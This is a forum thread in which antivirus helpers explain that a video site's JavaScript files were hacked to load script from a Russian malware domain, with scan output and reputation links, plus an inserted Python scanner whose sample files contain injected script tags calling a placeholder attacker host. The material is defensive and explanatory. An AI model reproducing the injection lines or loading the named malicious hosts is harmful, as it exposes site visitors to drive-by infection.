I am new to this forum.
Any idea why Avast is now blocking hxxp://www.motionempire.com?
Is there a safe way to access hxxp://www.motionempire.com without installing a different anti-virus?
Thank you!
Sherry
Attached are the two alerts that I am getting. First the Malware one then the Trojan
Thank you for any assistance.
Hi smheard,
Make the links non-click-through by putting wXw for www or htxp for http:
On the site there is a link to: pantscow.ru:8080/Tag.js French site with malicious activity … Adobe flash exploit abused - undefined variable Behaviour
error: undefined function Behaviour.register…
-
similar infection described here: http://badwarebusters.org/main/itemview/18707
and here: http://cert-in.org.in/knowledgebase/whitepapers/CICS-2009-01.pdf
http://lookup.uribl.com/
Malware on subdomain: http://blog.unmaskparasites.com/2010/06/17/malware-on-hijacked-subdomains-part-2/
The last time suspicious content was found on this subdomain site of the suspicious link was on 2010-07-16. Malicious software includes 25 trojans, 23 exploits.
This site was hosted on 17 networks including AS16276 (OVH), AS16265 (LEASEWEB), AS8972 (PLUSSERVER).
Has this site acted as an intermediary resulting in further distribution of malware?
Yes, pantscow.ru appeared to function as an intermediary for the infection of 2 sites including oykuforum.com/, izmirkamyoncularodasi.org.tr/.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 91 domains, including fo4.ru/, robertpattinson.org/, partnerilan.gen.tr/,
The site is ill-reported here: http://www.mywot.com/en/scorecard/motionempire.com
So you can safely visit it when the site has been cleansed or try to use an online proxy for the time being,
deactivate Javascript then…
polonus
There appears to be a packed javascript file being loaded with this site (image1) and it is that which avast is alerting on.
avast isn’t alone in finding something suspect about this file, http://www.virustotal.com/analisis/358a9bdafbb9410d9fefec346f947071870f38e1e3b1f21027a3daee0d92c4e6-1279309742.
So there isn’t really a safe way to access the site as it looks like it may have been hacked (very common now).
There is a second alert on another .js file (image2) and this has certainly been hacked with the insertion of a script tag at the end of the file, image3. So it may be that this is also what has happened in the first packed javascript file (which I can’t read because of its packing). This script tag is trying to run another script on what is most likely a malicious site (Russian domain).
There are more alerts and it appears that all the .js (javascript) files have been hacked in the same way; so the site has been hacked and there really is no safe way to connect to it until they have the infection cleaned and any vulnerability (reason why it got hacked) closed.
Also see, http://www.UnmaskParasites.com/security-report/?page=www.motionempire.com.
- Please ‘modify’ your post change the URL from http to hXXp or www to wXw, to break the link and avoid accidental exposure to suspect sites, thanks.
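The hack DavidR describes (an HTML script tag appended to the end of every .js file, pointing at an external host on a non-standard port) is easy to sweep for once you know the pattern. The scanner below is an added example written for this thread, not code from the forum or from avast; the file contents and the host evil.example are constructed placeholders, not the real domain discussed above.

```python
import re
from typing import Dict, List

# Constructed sample .js files mimicking the injection described in the thread:
# a legitimate script with a <script src=...> tag appended as the last line.
# "evil.example" is a placeholder host, not the real domain from the thread.
SAMPLE_FILES = {
    "js/menu.js": (
        "function showMenu(id){document.getElementById(id).style.display='block';}\n"
        "<script src=\"http://evil.example:8080/Tag.js\"></script>"
    ),
    "js/clean.js": "var counter = 1;\n// nothing appended here\n",
    "js/packed.js": (
        "eval(function(p,a,c,k,e,d){return p}('packed body here'))\n"
        "<script src='http://evil.example:8080/Heat_Sink.js'></script>\n"
    ),
}

# An HTML <script> tag has no business inside a JavaScript file, so any match
# is a strong injection indicator. Capture the src host and optional port.
SCRIPT_TAG = re.compile(
    r"<script[^>]*\bsrc\s*=\s*['\"]?(?:https?:)?//([^/'\"\s:>]+)(?::(\d+))?",
    re.IGNORECASE,
)


def find_injected_tags(content: str) -> List[Dict[str, object]]:
    """Return one record per <script src=...> tag found in a JS file's content."""
    hits: List[Dict[str, object]] = []
    lines = content.rstrip("\n").split("\n")
    for lineno, line in enumerate(lines, 1):
        for m in SCRIPT_TAG.finditer(line):
            port = int(m.group(2) or 80)
            hits.append({
                "line": lineno,
                "host": m.group(1),
                "port": port,
                # Appended-at-end is the exact pattern seen on the hacked site.
                "last_line": lineno == len(lines),
                # The thread's loader sat on :8080; flag anything but 80/443.
                "nonstandard_port": port not in (80, 443),
            })
    return hits


def scan_site(files: Dict[str, str]) -> Dict[str, List[Dict[str, object]]]:
    """Scan a mapping of path -> content; report only files with injected tags."""
    report = {}
    for path, content in files.items():
        hits = find_injected_tags(content)
        if hits:
            report[path] = hits
    return report


if __name__ == "__main__":
    for path, hits in scan_site(SAMPLE_FILES).items():
        for h in hits:
            print(f"{path}:{h['line']} loads {h['host']}:{h['port']}"
                  f"{' (appended at end)' if h['last_line'] else ''}")
```

On a real site, feed `scan_site` the contents of every .js file under the web root; the packed first file in DavidR's image1 would still be caught if the tag was appended after the packed blob.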
Hi DavidR,
But it is strange, that Sherry blames the scanner for flagging a malicious website and disconnecting her computer from a possible malware infection. Why then ask if she has to change to another av solution? Any good av solution would prevent her from going there as long as the malcode is on that website server…
This sort of comment explains that the majority of users do not know that there are reputable clean sites being hacked “en masse” by cybercriminals/malcreants/malvertisers and also a lot of users do not know what an exploit is, and more important what it could do! It is good that we can help them to fully understand the full size of the malware exposure and the threats out there,
polonus
I don’t comment on issues like that I just give the facts about the detection and let them make up their own minds. The problem is that people still have the concept of a safe site, which is or hasn’t been the case for some considerable time, so they automatically blame their AV, security software.
Hi DavidR,
Strange because it may be a real issue; consumer research in the Netherlands, my country, recently found that over 80% of my fellow countrymen do not know what is meant by terms like root kits, bot nets and exploits. Then 33% of users in this survey do not secure their wireless networks in any way. Still more than 76% of the 3.000 participants in the survey feel quite secure online, because of their online behavior patterns and good security…
Well all this may be considered as shocking and far from what is the reality as we experience it here, and in other countries the overall situation may be not very much better…leaves a lot for improvement, there is still a lot to do for us,
polonus
My thought about needing to switch AV is because my husband’s AVG is not alerting so I thought it was a false positive. Still find it strange and still want to watch my shows.
Hi smheard,
I can very well understand that, avast just has a good detection and probably Avira missed it and you do not want malware on your computer from going to that site, what you could do is send a mail to that website (abuse address) and give them the link to your thread, so they can clean their site of the malware at hand. It is not you, it is not your computer, it is something with the motionempire.com website, some malcreant has tried an exploit, got access to the site without the site-owner/admin/webmaster knowing and injected malicious script there. That is what happened, no, avast has saved you from getting an infection from there into your computer by disconnecting…
There are thousands and thousands of reputable good sites hacked by malcreants by using flaws in the webpage software and to use these hacks for getting malware to users’ machines with silent drive-by-downloads. You do not want your computer to be turned into a spam spewing bot or slowing down or showing strange unwanted sites, do you?
So go back to this favorite site when it is clean again and go to visit there through a proxy, and again it is not only avast finding the site malicious, see here: http://www.unmaskparasites.com/security-report/?page=www.motionempire.com
Stay safe and secure is the wish of, and I hope the site will be cleansed of the malcode very soon,
greets,
polonus
Nothing strange the site has been hacked and needs to be cleaned. The hack tries to run script at a malicious site, see image, avast blocks that too and avast isn’t the only one to consider it suspect, http://www.mywot.com/en/scorecard/pantscow.ru.
The problem is that there are only a few AV even looking for this type of hacked site, etc. and less that are even capable of detecting it and that is why there are so few results/hits on the VirusTotal scans.
Hi smheard,
Yes, DavidR is right there, avast has a remarkable detection rate with the shields, top of the bill, … I even have a double protection on board of my browser, I have the avast shields to protect me and I will not run certain script and block them with the NoScript extension inside the Firefox browser,
polonus
Hi malware fighters,
Here is another site with similar code there: htxp://www.izmirkamyoncularodasi.org.tr/
Re: htxp://jsunpack.jeek.org/dec/go?report=5fff316c2b47cdd4f5af10ef3fd4d4c188d6970a
info: [script] pantscow.ru:8080/Heat_Sink.js
info: [decodingLevel=0] found JavaScript
error: line:71: SyntaxError: missing } in XML expression:
error: line:71: for (m=0;m<message.length;m++)
error: line:71: ^
error: line:3: SyntaxError: missing = in XML attribute:
error: line:3: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
error: line:3: ...............^
file: fetch_cd2b75c3629b4039bf7e14240f0af2bb3659fd0e: 39533 bytes
polonus
Hi malware fighters,
Just info about the malware domain:
MD5: 092ed973686c9074320328a731bb1587
Infection Type: JS
Description: Malicious Javascript can either source in or directly execute code on a web page that can conduct drive-by-downloads, cause unwanted pop-ups or pop-unders, log keystrokes, steal browsing history, and so on.
Code Length: 73 bytes
Code Sample:
VirusTotal - pantscow.ru - 4/41
http://www.virustotal.com/analisis/0890b0d1a49807d8e9420b8bfe4e9947784ea0adffc4443d3f905c606020beb4-1279577739
Hi Pondus,
Yes, we have a good avast/GData detection here, I fired the URL up to finjan’s and they found “nada”…
Another nice informative link on this javascript malware:
http://sucuri.net/malware/entry/MW:JS:150
And again thanks for the VT check,
just another interesting link for you: http://www.malwaregroup.com/Domains/details/pantscow.ru
Damian